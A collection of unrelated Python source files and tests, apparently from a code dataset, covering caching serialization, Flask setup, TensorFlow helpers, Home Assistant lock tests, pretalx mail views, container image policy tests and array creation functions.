AlkymiConfig.get().cache_path = tmpdir # Use temporary directory for caching
@alk.recipe()
def produces_build_dir() -> Path:
build_dir = Path(tmpdir) / "build"
build_dir.mkdir(parents=False, exist_ok=True)
return build_dir
@alk.recipe(ingredients=[produces_build_dir])
def files_in_dir(build_dir: Path) -> List[Path]:
new_file_1 = build_dir / "test.txt"
new_file_1.touch()
new_file_2 = build_dir / "test2.txt"
new_file_2.touch()
return [new_file_1, new_file_2]
@alk.foreach(files_in_dir)
def read_file(f: Path) -> str:
with f.open('r') as fh:
return fh.read()
# Copy before brewing
produces_build_dir_copy = copy.deepcopy(produces_build_dir)
files_in_dir_copy = copy.deepcopy(files_in_dir)
read_file_copy = copy.deepcopy(read_file)
read_file.brew()
# Ensure copied state is correct after brew
for recipe in [produces_build_dir_copy, files_in_dir_copy, read_file_copy]:
assert recipe.input_checksums is None
assert recipe.outputs is None
assert recipe.output_checksums is None
assert read_file_copy.mapped_inputs is None
assert read_file_copy.mapped_inputs_checksums is None
assert read_file_copy.mapped_inputs_checksum is None
# Test serializing -> deserializing
produces_build_dir_copy.restore_from_dict(produces_build_dir.to_dict())
assert produces_build_dir_copy.input_checksums == produces_build_dir.input_checksums
assert produces_build_dir_copy.outputs == produces_build_dir.outputs
assert produces_build_dir_copy.output_checksums == produces_build_dir.output_checksums
files_in_dir_copy.restore_from_dict(files_in_dir.to_dict())
assert files_in_dir_copy.input_checksums == files_in_dir.input_checksums
assert files_in_dir_copy.outputs == files_in_dir.outputs
assert files_in_dir_copy.output_checksums == files_in_dir.output_checksums
read_file_copy.restore_from_dict(read_file.to_dict())
assert read_file_copy.input_checksums == read_file.input_checksums
assert read_file_copy.outputs == read_file.outputs
assert read_file_copy.output_checksums == read_file.output_checksums
assert read_file_copy.mapped_inputs_checksums == read_file.mapped_inputs_checksums
def test_complex_serialization(tmpdir):
"""
Test serializing a complex nested structure and checking it for validity (without deserializing) by inspecting Path
objects in the value hierarchy
"""
AlkymiConfig.get().cache = True
tmpdir = Path(str(tmpdir))
AlkymiConfig.get().cache_path = tmpdir # Use temporary directory for caching
subdir = tmpdir / "subdir"
subdir.mkdir()
file_a = tmpdir / "file_a.txt"
with file_a.open("w") as f:
f.write(f.name)
file_b = tmpdir / "file_a.txt"
with file_b.open("w") as f:
f.write(f.name)
# Cache object - everything should be valid at this point
value = (1, 2, 3, ["a", "b", "c"], [file_a, file_b])
obj = OutputWithValue(value, checksums.checksum(value))
obj_cached = serialization.cache(obj, subdir)
assert obj_cached.valid
# Touching an external file shouldn't cause invalidation
file_a.touch()
assert obj_cached.valid
# Changing one of the "external" files _should_ cause invalidation
with file_a.open("a") as f:
f.write("Changed!")
assert not obj_cached.valid
# Changing it back to the original value should cause things to work again
with file_a.open("w") as f:
f.write(f.name)
assert obj_cached.valid
class MyClass:
def __init__(self, value):
self.value = value
def test_enable_disable_pickling(tmpdir):
"""
Test turning pickling on/off for serialization and checksumming
"""
tmpdir = Path(str(tmpdir))
value = MyClass(5)
# Test pickling enabled
AlkymiConfig.get().allow_pickling = True
cache_path_generator = (tmpdir / str(i) for i in range(5))
result = serialization.serialize_item(value, cache_path_generator)
assert result.startswith(serialization.PICKLE_TOKEN)
assert serialization.deserialize_item(result).value == 5
assert checksums.checksum(result) is not None
# Test pickling disabled
AlkymiConfig.get().allow_pickling = False
with pytest.raises(RuntimeError):
serialization.serialize_item(value, cache_path_generator)
with pytest.raises(RuntimeError):
serialization.deserialize_item(result)
with pytest.raises(RuntimeError):
checksums.checksum(value)
# Return to default state
AlkymiConfig.get().allow_pickling = True
|
nilq/baby-python
|
python
|
# services/web/server/__init__.py
import os
from flask import Flask
app = Flask(
__name__,
template_folder='../client/templates',
static_folder='../client/static'
)
app_settings = os.getenv(
'APP_SETTINGS',
'server.config.DevelopmentConfig'
)
app.config.from_object(app_settings)
from server.main.views import main_blueprint
app.register_blueprint(main_blueprint)
|
nilq/baby-python
|
python
|
"""
Given a non-empty array of non-negative integers nums, the degree of this array is defined as the maximum
frequency of any one of its elements. Your task is to find the smallest possible length of a (contiguous)
subarray of nums, that has the same degree as nums.
Example 1:
Input: [1, 2, 2, 3, 1]
Output: 2
Explanation: The input array has a degree of 2 because both elements 1 and 2 appear twice. Of
the subarrays that have the same degree: [1, 2, 2, 3, 1], [1, 2, 2, 3], [2, 2, 3, 1],
[1, 2, 2], [2, 2, 3], [2, 2]. The shortest length is 2. So return 2.
Example 2:
Input: [1, 2, 2, 3, 1, 4, 2]
Output: 6
Note:
nums.length will be between 1 and 50,000.
nums[i] will be an integer between 0 and 49,999.
"""
class Solution:
def findShortestSubArray(self, nums): # 224ms
d = {}
for i, x in enumerate(nums):
if x in d:
d[x].append(i)
else:
d[x] = [i]
det = []
for val in d.values():
n = len(val)
if n == 1:
det.append((-1, 1))
else:
det.append((-n, val[-1] - val[0] + 1))
return min(det)[1]
|
nilq/baby-python
|
python
|
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import libs.model_common
'''
预测目标可以是(M,B,N,N), 也可以是(M,B,N,N,1)
'''
# X=(M,B,N,PN) ,y=(M,B,N,N)
def placeholder_vector(N, F_in, F_out):
samples = tf.compat.v1.placeholder(shape = (None, N, F_in), dtype = tf.float32,name="samples")
labels = tf.compat.v1.placeholder(shape = (None, N, F_out), dtype = tf.float32,name="lables")
return labels, samples
# X=(M,B,N,N,P) ,y=(M,B,N,N,1)
def placeholder_scalar(N, F_in, F_out):
samples = tf.compat.v1.placeholder(shape = (None, N, N, F_in), dtype = tf.float32,name="samples")
labels = tf.compat.v1.placeholder(shape = (None, N, N, F_out), dtype = tf.float32,name="lables")
return samples, labels
def placeholder_training():
is_training = tf.compat.v1.placeholder(shape=(),dtype=tf.bool, name="is_training")
return is_training
def Model(args, mean, std, X, F_out,drop_rate=None, bn=False, dims=None, is_training=True):
X = libs.model_common.multi_fc(X, activations=args.activations, units=args.units, drop_rate=drop_rate, bn=bn, dims=dims, is_training=is_training)
outputs = libs.model_common.multi_targets(X, std, mean, F_out)
return outputs
|
nilq/baby-python
|
python
|
import ctypes
from enum import Enum
class _DaveOSSerialType(ctypes.Structure):
_fields_ = [("rfd", ctypes.c_int), ("wfd", ctypes.c_int)]
class _DaveInterface(ctypes.Structure):
pass
class _DaveConnection(ctypes.Structure):
pass
class DaveArea(Enum):
daveSysInfo = 0x3 # System info of 200 family
daveSysFlags = 0x5 # System flags of 200 family
daveAnaIn = 0x6 # analog inputs of 200 family
daveAnaOut = 0x7 # analog outputs of 200 family
daveP = 0x80 # direct peripheral access
daveInputs = 0x81 # inputs
daveOutputs = 0x82 # outputs
daveFlags = 0x83 # flags \ markers
daveDB = 0x84 # data blocks
daveDI = 0x85 # instance data blocks
daveLocal = 0x86 # not tested
daveV = 0x87 # don't know what it is
daveCounter = 28 # S7 counters
daveTimer = 29 # S7 timers
daveCounter200 = 30 # IEC counters (200 family)
daveTimer200 = 31 # IEC timers (200 family)
daveSysDataS5 = 0x86 # system data area ?
daveRawMemoryS5 = 0 # just the raw memory
|
nilq/baby-python
|
python
|
"""Test the Z-Wave JS lock platform."""
from zwave_js_server.event import Event
from homeassistant.components.lock import (
DOMAIN as LOCK_DOMAIN,
SERVICE_LOCK,
SERVICE_UNLOCK,
)
from homeassistant.const import ATTR_ENTITY_ID, STATE_LOCKED, STATE_UNLOCKED
SCHLAGE_BE469_LOCK_ENTITY = "lock.touchscreen_deadbolt_current_lock_mode"
async def test_door_lock(hass, client, lock_schlage_be469, integration):
"""Test a lock entity with door lock command class."""
node = lock_schlage_be469
state = hass.states.get(SCHLAGE_BE469_LOCK_ENTITY)
assert state
assert state.state == STATE_UNLOCKED
# Test locking
await hass.services.async_call(
LOCK_DOMAIN,
SERVICE_LOCK,
{ATTR_ENTITY_ID: SCHLAGE_BE469_LOCK_ENTITY},
blocking=True,
)
assert len(client.async_send_command.call_args_list) == 1
args = client.async_send_command.call_args[0][0]
assert args["command"] == "node.set_value"
assert args["nodeId"] == 20
assert args["valueId"] == {
"commandClassName": "Door Lock",
"commandClass": 98,
"endpoint": 0,
"property": "targetMode",
"propertyName": "targetMode",
"metadata": {
"type": "number",
"readable": True,
"writeable": True,
"min": 0,
"max": 255,
"label": "Target lock mode",
"states": {
"0": "Unsecured",
"1": "UnsecuredWithTimeout",
"16": "InsideUnsecured",
"17": "InsideUnsecuredWithTimeout",
"32": "OutsideUnsecured",
"33": "OutsideUnsecuredWithTimeout",
"254": "Unknown",
"255": "Secured",
},
},
}
assert args["value"] == 255
client.async_send_command.reset_mock()
# Test locked update from value updated event
event = Event(
type="value updated",
data={
"source": "node",
"event": "value updated",
"nodeId": 20,
"args": {
"commandClassName": "Door Lock",
"commandClass": 98,
"endpoint": 0,
"property": "currentMode",
"newValue": 255,
"prevValue": 0,
"propertyName": "currentMode",
},
},
)
node.receive_event(event)
assert hass.states.get(SCHLAGE_BE469_LOCK_ENTITY).state == STATE_LOCKED
client.async_send_command.reset_mock()
# Test unlocking
await hass.services.async_call(
LOCK_DOMAIN,
SERVICE_UNLOCK,
{ATTR_ENTITY_ID: SCHLAGE_BE469_LOCK_ENTITY},
blocking=True,
)
assert len(client.async_send_command.call_args_list) == 1
args = client.async_send_command.call_args[0][0]
assert args["command"] == "node.set_value"
assert args["nodeId"] == 20
assert args["valueId"] == {
"commandClassName": "Door Lock",
"commandClass": 98,
"endpoint": 0,
"property": "targetMode",
"propertyName": "targetMode",
"metadata": {
"type": "number",
"readable": True,
"writeable": True,
"min": 0,
"max": 255,
"label": "Target lock mode",
"states": {
"0": "Unsecured",
"1": "UnsecuredWithTimeout",
"16": "InsideUnsecured",
"17": "InsideUnsecuredWithTimeout",
"32": "OutsideUnsecured",
"33": "OutsideUnsecuredWithTimeout",
"254": "Unknown",
"255": "Secured",
},
},
}
assert args["value"] == 0
|
nilq/baby-python
|
python
|
"""Define the CSRmatrix class."""
import numpy as np
from scipy.sparse import coo_matrix
from six import iteritems
from openmdao.matrices.coo_matrix import COOMatrix
class CSRMatrix(COOMatrix):
"""
Sparse matrix in Compressed Row Storage format.
"""
def _build(self, num_rows, num_cols):
"""
Allocate the matrix.
Parameters
----------
num_rows : int
number of rows in the matrix.
num_cols : int
number of cols in the matrix.
"""
data, rows, cols = self._build_sparse(num_rows, num_cols)
# get a set of indices that sorts into row major order
srtidxs = np.lexsort((cols, rows))
data = data[srtidxs]
rows = rows[srtidxs]
cols = cols[srtidxs]
# now sort these back into ascending order (our original stacked order)
# so in _update_submat() we can just extract the individual index
# arrays that will map each block into the combined data array.
revidxs = np.argsort(srtidxs)
metadata = self._metadata
for key, (ind1, ind2, idxs, jac_type, factor) in iteritems(metadata):
if idxs is None:
metadata[key] = (revidxs[ind1:ind2], jac_type, factor)
else:
# apply the reverse index to each part of revidxs so that
# we can avoid copying the index array during updates.
metadata[key] = (revidxs[ind1:ind2][np.argsort(idxs)],
jac_type, factor)
# data array for the CSR will be the same as for the COO since
# it was already in sorted order.
coo = coo_matrix((data, (rows, cols)), shape=(num_rows, num_cols))
coo_data_size = coo.data.size
self._matrix = coo.tocsr()
# make sure data size is the same between coo and csr, else indexing is
# messed up
if coo_data_size != self._matrix.data.size:
raise ValueError("CSR matrix data contains duplicate row/col entries. "
"This would break internal indexing.")
|
nilq/baby-python
|
python
|
# TODO: ext to __init__
from uuid import UUID
from typing import Union
import io
import torch
from neuroAPI.database.models import NeuralModelMetrics, MetricType, NeuralModel, Deposit, CrossValidation
from neuroAPI.neuralmodule.metrics import Metric
from neuroAPI.neuralmodule.network import NeuralNetwork as _NeuralNetwork
_METRIC_ID_BUFFER: dict[str, UUID] = {}
_ROCK_ID_BUFFER: dict[UUID, dict[int, UUID]] = {}
class NeuralNetwork(NeuralModel, _NeuralNetwork):
def __init__(self, output_count: int, deposit: Deposit, block_size: float, max_epochs: int,
cross_validation: CrossValidation = None, *args, **kwargs):
assert type(deposit) == Deposit, TypeError(f'type(`deposit`) == {type(deposit)}. '
'Expected neuroAPI.database.models.Deposit')
assert not cross_validation or type(cross_validation) == CrossValidation, \
TypeError(f'type(`cross_validation`) == {type(cross_validation)}. '
'Expected neuroAPI.database.models.CrossValidation')
try:
block_size = float(block_size)
except ValueError:
raise ValueError('`block_size` is not float-able')
try:
max_epochs = int(max_epochs)
except ValueError:
raise ValueError('`max_epochs` is not int-able')
NeuralModel.__init__(self, *args, **kwargs) # TODO: research about super() and refactor 4 flexibility
_NeuralNetwork.__init__(self, output_count) # +
self.deposit_id = deposit.id
self.block_size = block_size
self.max_epochs = max_epochs
if cross_validation:
self.cross_validation_id = cross_validation.id
def save(self):
buff = io.BytesIO()
torch.save(self, buff)
buff.seek(0)
self.dump = buff.read()
buff.close()
class PYCMMetric(NeuralModelMetrics, Metric):
def __init__(self, name: str, metric_type: MetricType, value: Union[float, int, str], epoch: int,
neural_model: NeuralNetwork, rock_index: int = None, *args, **kwargs):
assert type(metric_type) == MetricType, TypeError('`metric_type` is not from `MetricType` enum')
assert type(value) in [float, int, str], TypeError(f'type(`value`) == {type(value)}. '
'Expected Union[float, int, str]')
assert type(neural_model) == NeuralNetwork, TypeError(f'type(`neural_model`) == {type(neural_model)}. '
'Expected neuroAPI.neuralmodule.ext.NeuralNetwork')
NeuralModelMetrics.__init__(self, *args, **kwargs) # TODO: research about super() and refactor 4 flexibility
Metric.__init__(self, name=name, value=value) # +
self.name = name
self.neural_model_id = neural_model.id
self.metric_id = self.__get_metric_id(metric_type)
try:
self.epoch = int(epoch)
except ValueError:
raise ValueError('`epoch` is not int-able')
if rock_index:
self.rock_id = self.__get_rock_id(rock_index, neural_model)
self.value = self._value
def __get_metric_id(self, metric_type: MetricType) -> UUID:
try:
return _METRIC_ID_BUFFER[self.name]
except KeyError:
idx = self._get_create_metric(self.name, metric_type)
_METRIC_ID_BUFFER[self.name] = idx
return idx
def __get_rock_id(self, rock_index: int, neural_model: NeuralNetwork) -> UUID:
try:
return _ROCK_ID_BUFFER[neural_model.id][rock_index]
except KeyError:
idx = self._get_rock_id(rock_index, neural_model.deposit_id)
assert type(idx) == UUID, Exception(f'no rock with index {rock_index} '
f'for deposit {neural_model.deposit_id} in database')
try:
_ROCK_ID_BUFFER[neural_model.id][rock_index] = idx
except KeyError:
_ROCK_ID_BUFFER[neural_model.id] = {}
_ROCK_ID_BUFFER[neural_model.id][rock_index] = idx
return idx
@staticmethod
def _calculate(pred, true) -> float:
raise NotImplementedError
|
nilq/baby-python
|
python
|
from django.contrib import messages
from django.shortcuts import get_object_or_404, redirect
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from django.views.generic import FormView, ListView, TemplateView, View
from pretalx.common.mixins.views import (
ActionFromUrl, Filterable, PermissionRequired, Sortable,
)
from pretalx.common.views import CreateOrUpdateView
from pretalx.mail.context import get_context_explanation
from pretalx.mail.models import MailTemplate, QueuedMail
from pretalx.orga.forms.mails import MailDetailForm, MailTemplateForm, WriteMailForm
from pretalx.person.models import User
class OutboxList(PermissionRequired, Sortable, Filterable, ListView):
model = QueuedMail
context_object_name = 'mails'
template_name = 'orga/mails/outbox_list.html'
default_filters = ('to__icontains', 'subject__icontains')
filterable_fields = ('to', 'subject')
sortable_fields = ('to', 'subject')
paginate_by = 25
permission_required = 'orga.view_mails'
def get_permission_object(self):
return self.request.event
def get_queryset(self):
qs = self.request.event.queued_mails.filter(sent__isnull=True).order_by('id')
qs = self.filter_queryset(qs)
qs = self.sort_queryset(qs)
return qs
class SentMail(PermissionRequired, Sortable, Filterable, ListView):
model = QueuedMail
context_object_name = 'mails'
template_name = 'orga/mails/sent_list.html'
default_filters = ('to__icontains', 'subject__icontains')
filterable_fields = ('to', 'subject')
sortable_fields = ('to', 'subject', 'sent')
paginate_by = 25
permission_required = 'orga.view_mails'
def get_permission_object(self):
return self.request.event
def get_queryset(self):
qs = self.request.event.queued_mails.filter(sent__isnull=False).order_by(
'-sent'
)
qs = self.filter_queryset(qs)
qs = self.sort_queryset(qs)
return qs
class OutboxSend(PermissionRequired, TemplateView):
permission_required = 'orga.send_mails'
template_name = 'orga/mails/confirm.html'
def get_permission_object(self):
return self.request.event
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['question'] = _('Do you really want to send {count} mails?').format(
count=self.queryset.count()
)
return context
def dispatch(self, request, *args, **kwargs):
if 'pk' in self.kwargs:
try:
mail = self.request.event.queued_mails.get(pk=self.kwargs.get('pk'))
except QueuedMail.DoesNotExist:
messages.error(
request,
_(
'This mail either does not exist or cannot be discarded because it was sent already.'
),
)
return redirect(self.request.event.orga_urls.outbox)
if mail.sent:
messages.error(request, _('This mail had been sent already.'))
else:
mail.send()
mail.log_action(
'pretalx.mail.sent', person=self.request.user, orga=True
)
messages.success(request, _('The mail has been sent.'))
return redirect(self.request.event.orga_urls.outbox)
return super().dispatch(request, *args, **kwargs)
@cached_property
def queryset(self):
qs = self.request.event.queued_mails.filter(sent__isnull=True)
if 'pk' in self.kwargs:
qs = qs.filter(pk=self.kwargs['pk'])
return qs
def post(self, request, *args, **kwargs):
qs = self.queryset
count = qs.count()
for mail in qs:
mail.log_action('pretalx.mail.sent', person=self.request.user, orga=True)
mail.send()
messages.success(
request, _('{count} mails have been sent.').format(count=count)
)
return redirect(self.request.event.orga_urls.outbox)
class OutboxPurge(PermissionRequired, TemplateView):
permission_required = 'orga.purge_mails'
template_name = 'orga/mails/confirm.html'
def get_permission_object(self):
if 'pk' in self.kwargs:
return self.request.event.queued_mails.filter(
sent__isnull=True, pk=self.kwargs.get('pk')
).first()
return self.request.event
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['question'] = _('Do you really want to purge {count} mails?').format(
count=self.queryset.count()
)
return context
def dispatch(self, request, *args, **kwargs):
if 'pk' in self.kwargs:
try:
mail = self.request.event.queued_mails.get(
sent__isnull=True, pk=self.kwargs.get('pk')
)
except QueuedMail.DoesNotExist:
messages.error(
request,
_(
'This mail either does not exist or cannot be discarded because it was sent already.'
),
)
return redirect(self.request.event.orga_urls.outbox)
if mail.sent:
messages.error(request, _('This mail had been sent already.'))
else:
mail.log_action(
'pretalx.mail.delete', person=self.request.user, orga=True
)
mail.delete()
messages.success(request, _('The mail has been deleted.'))
return redirect(request.event.orga_urls.outbox)
return super().dispatch(request, *args, **kwargs)
@cached_property
def queryset(self):
qs = self.request.event.queued_mails.filter(sent__isnull=True)
if 'pk' in self.kwargs:
qs = qs.filter(pk=self.kwargs['pk'])
return qs
def post(self, request, *args, **kwargs):
qs = self.queryset
count = qs.count()
qs.delete()
messages.success(
request, _('{count} mails have been purged.').format(count=count)
)
return redirect(self.request.event.orga_urls.outbox)
class MailDetail(PermissionRequired, ActionFromUrl, CreateOrUpdateView):
model = QueuedMail
form_class = MailDetailForm
template_name = 'orga/mails/outbox_form.html'
write_permission_required = 'orga.edit_mails'
permission_required = 'orga.view_mails'
def get_object(self) -> QueuedMail:
return self.request.event.queued_mails.filter(pk=self.kwargs.get('pk')).first()
def get_success_url(self):
return self.object.event.orga_urls.outbox
def form_valid(self, form):
form.instance.event = self.request.event
if form.instance.sent is not None:
messages.error(
self.request,
_('The email has already been sent, you cannot edit it anymore.'),
)
return redirect(self.get_success_url())
result = super().form_valid(form)
if form.has_changed():
action = 'pretalx.mail.' + ('update' if self.object else 'create')
form.instance.log_action(action, person=self.request.user, orga=True)
action = form.data.get('form', 'save')
if action == 'save':
messages.success(
self.request,
_(
'The email has been saved. When you send it, the updated text will be used.'
),
)
elif action == 'send':
form.instance.send()
messages.success(self.request, _('The email has been sent.'))
return result
class MailCopy(PermissionRequired, View):
permission_required = 'orga.send_mails'
def get_object(self) -> QueuedMail:
return get_object_or_404(
self.request.event.queued_mails, pk=self.kwargs.get('pk')
)
def dispatch(self, request, *args, **kwargs):
mail = self.get_object()
new_mail = mail.copy_to_draft()
messages.success(request, _('The mail has been copied, you can edit it now.'))
return redirect(new_mail.urls.edit)
class ComposeMail(PermissionRequired, FormView):
form_class = WriteMailForm
template_name = 'orga/mails/send_form.html'
permission_required = 'orga.send_mails'
def get_permission_object(self):
return self.request.event
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['event'] = self.request.event
if 'template' in self.request.GET:
template = MailTemplate.objects.filter(
pk=self.request.GET.get('template')
).first()
if template:
initial = kwargs.get('initial', dict())
initial['subject'] = template.subject
initial['text'] = template.text
initial['reply_to'] = template.reply_to
initial['bcc'] = template.bcc
kwargs['initial'] = initial
if 'submission' in self.request.GET:
submission = self.request.event.submissions.filter(
code=self.request.GET.get('submission')
).first()
if submission:
initial = kwargs.get('initial', dict())
initial['recipients'] = 'selected_submissions'
initial['submissions'] = submission.code
kwargs['initial'] = initial
return kwargs
def get_success_url(self):
return self.request.event.orga_urls.compose_mails
def form_valid(self, form):
email_set = set()
for recipient in form.cleaned_data.get('recipients'):
if recipient == 'reviewers':
mails = (
User.objects.filter(
teams__in=self.request.event.teams.filter(is_reviewer=True)
)
.distinct()
.values_list('email', flat=True)
)
else:
if recipient == 'selected_submissions':
submission_filter = {
'code__in': form.cleaned_data.get('submissions')
}
else:
submission_filter = {'state': recipient} # e.g. "submitted"
mails = self.request.event.submissions.filter(
**submission_filter
).values_list('speakers__email', flat=True)
email_set.update(mails)
for email in email_set:
QueuedMail.objects.create(
event=self.request.event,
to=email,
reply_to=form.cleaned_data.get('reply_to', self.request.event.email),
cc=form.cleaned_data.get('cc'),
bcc=form.cleaned_data.get('bcc'),
subject=form.cleaned_data.get('subject'),
text=form.cleaned_data.get('text'),
)
messages.success(
self.request,
_(
'The emails have been saved to the outbox – you can make individual changes there or just send them all.'
),
)
return super().form_valid(form)
class TemplateList(PermissionRequired, TemplateView):
template_name = 'orga/mails/template_list.html'
permission_required = 'orga.view_mail_templates'
def get_permission_object(self):
return self.request.event
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
accept = self.request.event.accept_template
ack = self.request.event.ack_template
reject = self.request.event.reject_template
update = self.request.event.update_template
context['accept'] = MailTemplateForm(
instance=accept, read_only=True, event=self.request.event
)
context['ack'] = MailTemplateForm(
instance=ack, read_only=True, event=self.request.event
)
context['reject'] = MailTemplateForm(
instance=reject, read_only=True, event=self.request.event
)
context['update'] = MailTemplateForm(
instance=update, read_only=True, event=self.request.event
)
pks = [
template.pk if template else None
for template in [accept, ack, reject, update]
]
context['other'] = [
MailTemplateForm(
instance=template, read_only=True, event=self.request.event
)
for template in self.request.event.mail_templates.exclude(
pk__in=[pk for pk in pks if pk]
)
]
return context
class TemplateDetail(PermissionRequired, ActionFromUrl, CreateOrUpdateView):
model = MailTemplate
form_class = MailTemplateForm
template_name = 'orga/mails/template_form.html'
permission_required = 'orga.view_mail_templates'
write_permission_required = 'orga.edit_mail_templates'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
template = self.object
if template and template in template.event.fixed_templates:
context['placeholders'] = get_context_explanation()
return context
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['event'] = self.request.event
return kwargs
def get_object(self) -> MailTemplate:
return MailTemplate.objects.filter(
event=self.request.event, pk=self.kwargs.get('pk')
).first()
@cached_property
def object(self):
return self.get_object()
def get_permission_object(self):
return self.object or self.request.event
def get_success_url(self):
return self.request.event.orga_urls.mail_templates
def form_valid(self, form):
form.instance.event = self.request.event
if form.has_changed():
action = 'pretalx.mail_template.' + ('update' if self.object else 'create')
form.instance.log_action(action, person=self.request.user, orga=True)
messages.success(
self.request,
'The template has been saved - note that already pending emails that are based on this template will not be changed!',
)
return super().form_valid(form)
class TemplateDelete(PermissionRequired, View):
permission_required = 'orga.edit_mail_templates'
def get_object(self) -> MailTemplate:
return get_object_or_404(
MailTemplate.objects.all(),
event=self.request.event,
pk=self.kwargs.get('pk'),
)
def dispatch(self, request, *args, **kwargs):
super().dispatch(request, *args, **kwargs)
template = self.get_object()
template.log_action(
'pretalx.mail_template.delete', person=self.request.user, orga=True
)
template.delete()
messages.success(request, 'The template has been deleted.')
return redirect(request.event.orga_urls.mail_templates)
|
nilq/baby-python
|
python
|
import pytest
import connaisseur.policy
from connaisseur.image import Image
from connaisseur.exceptions import BaseConnaisseurException
match_image_tag = "docker.io/securesystemsengineering/sample:v1"
match_image_digest = (
"docker.io/securesystemsengineering/sample@sha256:"
"1388abc7a12532836c3a81bdb0087409b15208f5aeba7a87aedcfd56d637c145"
)
policy = {
"rules": [
{"pattern": "*:*", "verify": True, "delegations": ["phbelitz", "chamsen"]},
{"pattern": "docker.io/*:*", "verify": True, "delegations": ["phbelitz"]},
{"pattern": "k8s.gcr.io/*:*", "verify": False},
{"pattern": "gcr.io/*:*", "verify": False},
{
"pattern": "docker.io/securesystemsengineering/*:*",
"verify": True,
"delegations": ["someuserthatdidnotsign"],
},
{
"pattern": "docker.io/securesystemsengineering/sample",
"verify": True,
"delegations": ["phbelitz", "chamsen"],
},
{"pattern": "docker.io/securesystemsengineering/sample:v4", "verify": False},
{
"pattern": "docker.io/securesystemsengineering/connaisseur:*",
"verify": False,
},
{
"pattern": "docker.io/securesystemsengineering/sample-san-sama",
"verify": True,
},
]
}
@pytest.fixture
def pol():
return connaisseur.policy
@pytest.fixture
def mock_policy(monkeypatch):
def get_policy():
return policy
connaisseur.policy.ImagePolicy.get_image_policy = staticmethod(get_policy)
connaisseur.policy.ImagePolicy.JSON_SCHEMA_PATH = "res/policy_schema.json"
@pytest.mark.parametrize(
"rule, image, comp_count, comp_len, pre_len",
[
("", "", 1, [2], [0]),
("*:*", match_image_tag, 1, [3], [0]),
("doc*/*", match_image_tag, 2, [4, 3], [3, 0]),
("*/sec*/*:*", match_image_tag, 3, [1, 4, 3], [0, 3, 0]),
("*@sha256:*", match_image_digest, 1, [10], [0]),
],
)
def test_match(
pol, rule: str, image: str, comp_count: int, comp_len: list, pre_len: list
):
match = pol.Match(rule, image)
rule_with_tag = rule if ":" in rule else f"{rule}:*"
assert match.key == rule
assert match.pattern == rule_with_tag
assert match.component_count == comp_count
assert match.component_lengths == comp_len
assert match.prefix_lengths == pre_len
@pytest.mark.parametrize("rule, exist", [("", False), ("*", True)])
def test_match_bool(pol, rule: str, exist: bool):
match = pol.Match(rule, "image")
assert bool(match) == exist
@pytest.mark.parametrize(
"rule1, rule2, image",
[
("", "*", match_image_tag),
("*", "*:*", match_image_tag),
("*:*", "*/*", match_image_tag),
("*/*", "docker*/*", match_image_tag),
("docker*/*", "*/*/*", match_image_tag),
("*/*/image:v1", "*/sam*/*", match_image_tag),
],
)
def test_match_compare(pol, rule1: str, rule2: str, image: str):
m1 = pol.Match(rule1, image)
m2 = pol.Match(rule2, image)
fighters = [m1, m2]
assert m1.compare(m2) == fighters[1]
def test_image_pol(pol, mock_policy):
p = pol.ImagePolicy()
assert p.policy == policy
@pytest.mark.parametrize(
"image, rule",
[
(
"image:tag",
{"pattern": "docker.io/*:*", "verify": True, "delegations": ["phbelitz"]},
),
(
"reg.io/image:tag",
{"pattern": "*:*", "verify": True, "delegations": ["phbelitz", "chamsen"]},
),
("k8s.gcr.io/path/image", {"pattern": "k8s.gcr.io/*:*", "verify": False}),
(
"docker.io/securesystemsengineering/sample:v4",
{
"pattern": "docker.io/securesystemsengineering/sample:v4",
"verify": False,
},
),
],
)
def test_get_matching_rule(pol, mock_policy, image: str, rule: dict):
p = pol.ImagePolicy()
assert p.get_matching_rule(Image(image)) == rule
def test_get_matching_rule_error(pol, mock_policy):
p = pol.ImagePolicy()
p.policy["rules"] = p.policy["rules"][1:]
with pytest.raises(BaseConnaisseurException) as err:
p.get_matching_rule(Image("reg.io/image"))
assert (
"no matching rule for image " '"reg.io/image:latest" could be found.'
) in str(err.value)
def test_image_pol_error(pol, mock_policy):
policy["rules"] += {"pattern": "***"}
with pytest.raises(BaseConnaisseurException) as err:
assert pol.ImagePolicy()
assert "invalid format for image policy." in str(err.value)
|
nilq/baby-python
|
python
|
from clpy import core
def array(obj, dtype=None, copy=True, order='K', subok=False, ndmin=0):
"""Creates an array on the current device.
This function currently does not support the ``order`` and ``subok``
options.
Args:
obj: :class:`clpy.ndarray` object or any other object that can be
passed to :func:`numpy.array`.
dtype: Data type specifier.
copy (bool): If ``False``, this function returns ``obj`` if possible.
Otherwise this function always returns a new array.
order ({'C', 'F', 'A', 'K'}): Row-major (C-style) or column-major
(Fortran-style) order.
When ``order`` is 'A', it uses 'F' if ``a`` is column-major and
uses 'C' otherwise.
And when ``order`` is 'K', it keeps strides as closely as
possible.
If ``obj`` is :class:`numpy.ndarray`, the function returns 'C' or
'F' order array.
subok (bool): If True, then sub-classes will be passed-through,
otherwise the returned array will be forced to be a base-class
array (default).
ndmin (int): Minimum number of dimensions. Ones are inserted to the
head of the shape if needed.
Returns:
clpy.ndarray: An array on the current device.
.. note::
This method currently does not support ``subok`` argument.
.. seealso:: :func:`numpy.array`
"""
return core.array(obj, dtype, copy, order, subok, ndmin)
def asarray(a, dtype=None):
"""Converts an object to array.
This is equivalent to ``array(a, dtype, copy=False)``.
This function currently does not support the ``order`` option.
Args:
a: The source object.
dtype: Data type specifier. It is inferred from the input by default.
Returns:
clpy.ndarray: An array on the current device. If ``a`` is already on
the device, no copy is performed.
.. seealso:: :func:`numpy.asarray`
"""
return core.array(a, dtype, False)
def asanyarray(a, dtype=None):
"""Converts an object to array.
This is currently equivalent to :func:`~clpy.asarray`, since there is no
subclass of ndarray in CuPy. Note that the original
:func:`numpy.asanyarray` returns the input array as is if it is an instance
of a subtype of :class:`numpy.ndarray`.
.. seealso:: :func:`clpy.asarray`, :func:`numpy.asanyarray`
"""
return core.array(a, dtype, False)
def ascontiguousarray(a, dtype=None):
"""Returns a C-contiguous array.
Args:
a (clpy.ndarray): Source array.
dtype: Data type specifier.
Returns:
